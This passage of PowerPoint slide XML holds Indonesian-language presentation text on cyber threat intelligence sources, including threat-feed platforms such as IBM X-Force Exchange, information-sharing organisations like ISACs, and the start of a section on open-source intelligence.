              <a:t> platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> blog, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan webinar. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>IBM X-Force Exchange (exchange.xforce.ibmcloud.com)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Mandiant's FireEye (mandiant.com/advantage/threat-intelligence)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Recorded Future (recordedfuture.com/platform/threat-intelligence)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pembagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Informasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kolaboratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertukar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muncul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi-organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengumpulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebarluaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelijen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>anggotanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peneliti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber-sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Anggota</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>entitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lembaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akademis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manfaat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelijen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> individual. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membentengi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merespons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muncul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semacam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Aliansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Siber dan Pusat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (ISAC) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjangkau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi-organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kolektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempromosikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kolaboratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Intelijen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Terbuka</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Intelijen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (OSINT) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengumpulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengambilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
